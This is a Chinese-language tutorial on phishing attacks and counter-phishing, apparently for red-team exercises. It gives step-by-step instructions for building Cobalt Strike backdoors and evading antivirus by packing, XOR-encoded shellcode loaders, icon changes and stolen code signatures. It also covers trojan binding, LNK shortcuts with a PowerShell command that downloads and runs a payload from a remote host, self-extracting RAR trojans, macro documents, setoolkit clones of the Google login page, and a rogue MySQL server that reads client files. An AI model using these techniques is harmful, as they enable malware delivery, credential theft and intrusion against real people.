钓鱼反制
一、钓鱼邮件
钓鱼邮件一般采用远程控制后门木马(毕竟攻防演练中整个具有破坏性的病毒时违反演练归档的)
1.1、钓鱼文件生成
cobaltstrie生成钓鱼文件
1.1.1、普通exe
1.2、exe免杀
因为杀毒软件病毒库几乎每周都会更新,免杀技术时效性很强
1.2.1、常见查杀方式
- 静态查杀:对文件进行特征匹配的思路
- 云查杀:对文件内容及行为的检测
- 动态查杀:对其产生的行为进行检测
1.2.2、加壳
部分杀毒软件会将加壳后的程序视为恶意文件
利用特殊的算法,度可执行文件里的资源进行压缩,只不过这个压缩,只不过这个压缩文件,可以独立运行,解压过程完全隐蔽,都在内存中完成。windows平台常见的壳如upx(压缩壳)、vmp(虚拟机壳)、穿山甲(加密壳)
themida:通过加密、虚拟化、防调试等技术来保护Windows程序的安全性和可控性。但加壳后的程序在部分系统上可能会运行失败(任何形式的加密混淆都可能导致无法运行)。
不加壳之前,火绒秒杀
直接把生成的exe拉到themia中
点击protect
加壳成功后,火绒没有查杀出来
1.3、shellcode加载器
shellocde是后门木马程序中操作系统实际执行的部分,是最关键的核心
shellcode加载器一般使用C语言、Golang语言编写
- golang安装包,编写好的shellcode加载器(golang)
1.3.1、安装必要板块
|
1.3.2、cobaltsrike生成C payload
xor64.py文件以及xor.go文件:
GobypassAV-shellcode/xor+base64 at main · Pizz33/GobypassAV-shellcode (github.com)
构造 xor64.py (对shellcode进行xor及base64编码), 将上一步生成的 payload.c 中双引号内的字符串,复制到 xor64.py 第三行 originalShellcode = b”” 双引号内 , 然后运行xor64.py
py xor64.py |
将 xor64.py 运行后输出的结果,复制到 xor.go 文件第15行 encryptedShellcode := “” 双引号内,然后编译xor.go生成xor.exe, 此命令不会有输出,只会在文件夹中生成xor.exe
go build xor.go |
免杀失败!!
正常情况应该不会被360检测出来
1.4、修改文件特征
一般免杀360的文件,都会被上传至360安全大脑进行动态分析与行为检测,产生的效果就是,在联网的情况下,一个免杀的文件过了三四分钟,就被360识别为病毒,其文件hash会被加入360的病毒特征库,再次上传将会被秒杀。
有两种方法可以应对
- 重新用cobaltstrie生成后门文件,重新编译shellcode加载器
- 对以及被查杀的文件做手脚,改变器hash及特征
1.4.1、修改图标
使用工具:BeCylconGrabberPortable
选择最大的那个
提取后进行修改
手动修改
使用工具:Restorator2018
将exe拖进软件中,右键添加资源
把ico图标文件拖动到图标文件夹
删除之前创建的TEST,保存即可
使用360进行查杀
发现成功免杀
1.4.2、自动修改图标
通过修改图标批量生成新的后门文件
使用工具:icon-exe.py
python icon-exe.py -i 木马文件 -f ICO图标文件 -n 生成的个数 |
该工具会对Ico图标文件进行重新渲染处理,所以生成的每个后门文件hash值均不相同,生成的文件会放在output目录中
生成的exe
通过免杀
1.4.3、替换签名
使用工具:sigthief.py
默认生成的后门文件都是没有签名的,一些杀毒软件遇到未知签名的程序会直接报毒。sigthief的作用是窃取签名,比如给自己的后门添加的奇虎的数字签名
python3 sigthief.py -i 你要窃取的文件 -t 木马后门 -o 生成的新文件 |
二、钓鱼反制
2.1、捆版木马
使用GoFileVBinder.exe,需要Go语言运行环境
GoFileBinder.exe 木马文件 要绑定的正常文件 |
可以在更改一下,图标这样的话会更像,这里由于是演示,懒得改了。
运行时,会在当前目录释放并打开test.txt , 并释放5.exe到用户目录运行,配合上签名、图标、免杀,再加上合理选择释放的文件,可以钓到很多安全意识不佳的人员
但是好像没法经过查杀
2.2、Ink木马
ink快捷方式木马经常被应用在钓鱼和恶意软件中,通过快捷方式的目标地址实现运行木马,不过这种方式很容易被杀毒软件查实
操作步骤
- 使用cobaltstrike生成scripted Web Delivery(S)
把这句话复制下来
- 使用绝对路径的形式改写powershell.exe
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.43.128:80/a'))" |
- 修改ink快捷方式目标
更改后,图标也会变化,可以更改一下图标。
运行后,可以发现目标在cs中上线了
2.3、rar自解压木马
使用工具:winrar
- 准备 木马文件 与 正常文件 右键添加到 winrar
- 勾选 创建自解压格式压缩文件(X) , 勾选后压缩文件名会自动修改后缀为 .exe
点击 高级 ,选择 子解压选项,在新的窗口常规菜单中设置解压路径,一般为 C:\Windows\Temp
在设置菜单中设置解压后运行,分别是 木马文件绝对路径 和 正常文件绝对路径
在模式菜单中设置静默模式为全部隐藏
在更新菜单中设置更新模式为解压并更新文件,覆盖模式为覆盖所有文件
可以更改一下图标
运行后就是正常的安装过程
在安装程序运行的那个时间cs就会上线
可以和修改文件名、修改图标、免杀配合起来使用效果更佳。
2.4、office宏钓鱼
新版的office会默认禁用宏
新建一个word
创建宏
存储为启用宏的docm文档
运行nb.docm 就上线
一般杀毒软件秒杀
2.5、钓鱼网站
使用工具setoolit
- 运行setoolkit,选择 1 ) 社会工程学攻击
选择 2) 网站攻击
选择3) 获取凭证攻击
这里会出现三个选项 , 1) 网站模版 2)网站克隆 3) 自定义导
使用 1)网站模版, 选择Google
可以看到模拟出了google的登录页面,输入后会自动跳转至google,且输入的账号和密码会被setoolkit获取
这种情况是80端口被占用,
netstat -anltup | grep 80 |
kill 9 PID |
杀死进程,后重新在使用工具进行选择一次后,页面如下
登录后会跳转到谷歌搜索首页面
也可以自己定义页面和网址
真实的钓鱼网站,需要搭建在公网服务器上,且为了提高钓鱼成功率,会租赁比较相似的域名,用于迷惑受害者
域名购买网站:https://www.godaddy.com/zh-sg
三、mysql蜜罐
https://github.com/Gifts/Rogue-MySql-Server
hfish mysql蜜罐
MySQL服务端可以利用LOAD DATA LOCAL命令来读取MYSQL客户端的任意文件,然后伪造恶意服务器向连接到这个服务器的客户端发送读取文件的payload。
受害者采用任意密码连接mysql
获取攻击者电脑用户名
{ |
获取微信ID
{ |
查看攻击者的微信id,路径是默认的微信存放文件的地址,
如果更改过地址,将会查询不到
根据获得的微信id号,去网上生成微信二维码
这个id号无法直接搜索到